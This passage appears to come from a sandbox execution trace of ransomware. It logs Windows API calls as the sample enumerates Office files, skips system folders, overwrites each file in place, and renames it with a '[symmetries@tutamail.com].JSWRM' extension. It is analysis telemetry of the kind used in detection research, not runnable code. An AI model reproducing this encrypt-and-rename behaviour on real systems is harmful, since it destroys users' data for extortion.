ftLastWriteTime.dwLowDateTime=0x23526361, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c9a2, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="STORYVERTBB.DPV", cAlternateFileName="STORYV~1.DPV")) returned 1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2=".") returned 1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2="..") returned 1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2="...") returned 1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2="windows") returned -1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2="recovery") returned 1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2="perflogs") returned 1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2="documents and settings") returned 1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2="$RECYCLE.BIN") returned 1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2="system volume information") returned -1 [0143.449] lstrcmpiW (lpString1="STORYVERTBB.DPV", lpString2="msocache") returned 1 [0143.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYVERTBB.DPV", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0143.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYVERTBB.DPV", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STORYVERTBB.DPV", lpUsedDefaultChar=0x0) returned 15 [0143.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYVERTBB.DPV", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0143.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYVERTBB.DPV", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STORYVERTBB.DPV", lpUsedDefaultChar=0x0) returned 15 [0143.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYVERTBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storyvertbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.450] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=313762) returned 1 [0143.450] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.450] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0143.465] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.465] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0143.466] CloseHandle (hObject=0x238) returned 1 [0143.466] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYVERTBB.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storyvertbb.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYVERTBB.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storyvertbb.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.467] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23526361, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23526361, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23526361, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6f7e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="STORYVERTBB.POC", cAlternateFileName="STORYV~1.POC")) returned 1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2=".") returned 1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2="..") returned 1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2="...") returned 1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2="windows") returned -1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2="recovery") returned 1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2="perflogs") returned 1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2="documents and settings") returned 1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2="system volume information") returned -1 [0143.467] lstrcmpiW (lpString1="STORYVERTBB.POC", lpString2="msocache") returned 1 [0143.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYVERTBB.POC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0143.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYVERTBB.POC", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STORYVERTBB.POC", lpUsedDefaultChar=0x0) returned 15 [0143.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYVERTBB.POC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0143.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STORYVERTBB.POC", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STORYVERTBB.POC", lpUsedDefaultChar=0x0) returned 15 [0143.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYVERTBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storyvertbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.468] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28542) returned 1 [0143.468] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.469] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6f70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6f70, lpOverlapped=0x0) returned 1 [0143.472] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.472] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6f70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6f70, lpOverlapped=0x0) returned 1 [0143.472] CloseHandle (hObject=0x238) returned 1 [0143.472] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYVERTBB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storyvertbb.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STORYVERTBB.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\storyvertbb.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.473] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23526361, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23526361, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23526361, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="STRBRST.POC", cAlternateFileName="")) returned 1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2=".") returned 1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2="..") returned 1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2="...") returned 1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2="windows") returned -1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2="recovery") returned 1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2="perflogs") returned 1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2="documents and settings") returned 1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2="system volume information") returned -1 [0143.473] lstrcmpiW (lpString1="STRBRST.POC", lpString2="msocache") returned 1 [0143.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STRBRST.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STRBRST.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STRBRST.POC", lpUsedDefaultChar=0x0) returned 11 [0143.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STRBRST.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STRBRST.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STRBRST.POC", lpUsedDefaultChar=0x0) returned 11 [0143.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STRBRST.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\strbrst.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.475] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1138) returned 1 [0143.475] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.475] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x470, lpOverlapped=0x0) returned 1 [0143.476] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.477] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x470, lpOverlapped=0x0) returned 1 [0143.477] CloseHandle (hObject=0x238) returned 1 [0143.477] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STRBRST.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\strbrst.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\STRBRST.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\strbrst.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.478] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23526361, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="TEAROFF.POC", cAlternateFileName="")) returned 1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2=".") returned 1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2="..") returned 1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2="...") returned 1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2="windows") returned -1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2="recovery") returned 1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2="perflogs") returned 1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2="documents and settings") returned 1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2="system volume information") returned 1 [0143.478] lstrcmpiW (lpString1="TEAROFF.POC", lpString2="msocache") returned 1 [0143.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TEAROFF.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TEAROFF.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEAROFF.POC", lpUsedDefaultChar=0x0) returned 11 [0143.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TEAROFF.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TEAROFF.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEAROFF.POC", lpUsedDefaultChar=0x0) returned 11 [0143.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\TEAROFF.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\tearoff.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.479] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1014) returned 1 [0143.479] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.479] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x3f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x3f0, lpOverlapped=0x0) returned 1 [0143.481] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.481] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x3f0, lpOverlapped=0x0) returned 1 [0143.481] CloseHandle (hObject=0x238) returned 1 [0143.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\TEAROFF.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\tearoff.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\TEAROFF.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\tearoff.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.482] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23526361, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23526361, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23526361, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40a0a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="TOC98.POC", cAlternateFileName="")) returned 1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2=".") returned 1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2="..") returned 1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2="...") returned 1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2="windows") returned -1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2="recovery") returned 1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2="perflogs") returned 1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2="documents and settings") returned 1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2="system volume information") returned 1 [0143.482] lstrcmpiW (lpString1="TOC98.POC", lpString2="msocache") returned 1 [0143.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOC98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOC98.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TOC98.POC", lpUsedDefaultChar=0x0) returned 9 [0143.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOC98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TOC98.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TOC98.POC", lpUsedDefaultChar=0x0) returned 9 [0143.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\TOC98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\toc98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.483] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=264714) returned 1 [0143.483] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.483] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0143.543] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.543] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0143.544] CloseHandle (hObject=0x238) returned 1 [0143.544] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\TOC98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\toc98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\TOC98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\toc98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.546] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23526361, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eab0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WCOMP98.POC", cAlternateFileName="")) returned 1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2=".") returned 1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2="..") returned 1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2="...") returned 1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2="windows") returned -1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2="recovery") returned 1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2="perflogs") returned 1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2="documents and settings") returned 1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2="system volume information") returned 1 [0143.546] lstrcmpiW (lpString1="WCOMP98.POC", lpString2="msocache") returned 1 [0143.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WCOMP98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WCOMP98.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WCOMP98.POC", lpUsedDefaultChar=0x0) returned 11 [0143.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WCOMP98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 